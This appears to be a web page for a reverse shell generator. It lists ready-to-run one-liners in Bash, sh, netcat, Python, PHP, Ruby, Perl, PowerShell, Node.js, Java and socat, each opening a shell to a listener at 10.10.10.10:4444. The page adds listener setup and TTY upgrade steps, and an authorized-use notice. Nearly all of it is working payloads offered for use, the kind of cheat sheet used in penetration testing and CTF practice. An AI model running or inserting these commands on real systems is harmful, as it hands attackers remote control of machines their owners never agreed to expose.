Reverse Shell Generator

generators

Generate reverse shell one-liners for Bash, Python, PHP, PowerShell and more

Listener IP / Host

Port

Bash TCPUnix

bash -i >& /dev/tcp/10.10.10.10/4444 0>&1

Bash UDPUnix

bash -i >& /dev/udp/10.10.10.10/4444 0>&1

sh TCPUnix

0<&196;exec 196<>/dev/tcp/10.10.10.10/4444; sh <&196 >&196 2>&196

Netcat (nc)Unix

nc -e /bin/sh 10.10.10.10 4444

Netcat (mkfifo)Unix

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.10.10 4444 >/tmp/f

Python 3Python

python3 -c 'import os,socket,subprocess;s=socket.socket();s.connect(("10.10.10.10",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];subprocess.call(["/bin/sh","-i"])'

Python 2Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHPWeb

php -r '$sock=fsockopen("10.10.10.10",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

PHP (proc_open)Web

php -r '$s=fsockopen("10.10.10.10",4444);$proc=proc_open("/bin/sh -i",array(0=>$s,1=>$s,2=>$s),$pipes);'

RubyScripting

ruby -rsocket -e 'f=TCPSocket.open("10.10.10.10",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

PerlScripting

perl -e 'use Socket;$i="10.10.10.10";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

PowerShellWindows

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.10.10.10",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

PowerShell (short)Windows

$c=New-Object Net.Sockets.TCPClient("10.10.10.10",4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length))-ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$r2=$r+"PS "+(pwd).Path+"> ";$sb=([text.encoding]::ASCII).GetBytes($r2);$s.Write($sb,0,$sb.Length);$s.Flush()};$c.Close()

Node.jsJavaScript

node -e "require('child_process').exec('bash -i >& /dev/tcp/10.10.10.10/4444 0>&1')"

JavaJVM

r = Runtime.getRuntime();p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.10.10/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]);p.waitFor()

Socat TCPUnix

socat TCP:10.10.10.10:4444 EXEC:/bin/sh

Socat PTYUnix

socat TCP:10.10.10.10:4444 EXEC:'bash -li',pty,stderr,setsid,sigint,sane

Usage Notes

Setting Up a Listener

Start a netcat listener on your machine before executing the shell command:

nc -lvnp 4444

Upgrading to PTY

After catching a shell, upgrade to a full TTY:

python3 -c 'import pty;pty.spawn("/bin/bash")' # then: Ctrl+Z stty raw -echo; fg export TERM=xterm

Authorized Use Only

This tool is intended for authorized penetration testing, CTF competitions, and security research on systems you own or have explicit written permission to test. Unauthorized use against systems you do not own is illegal.

Tagsreverse-shellpentestctfsecurityred-team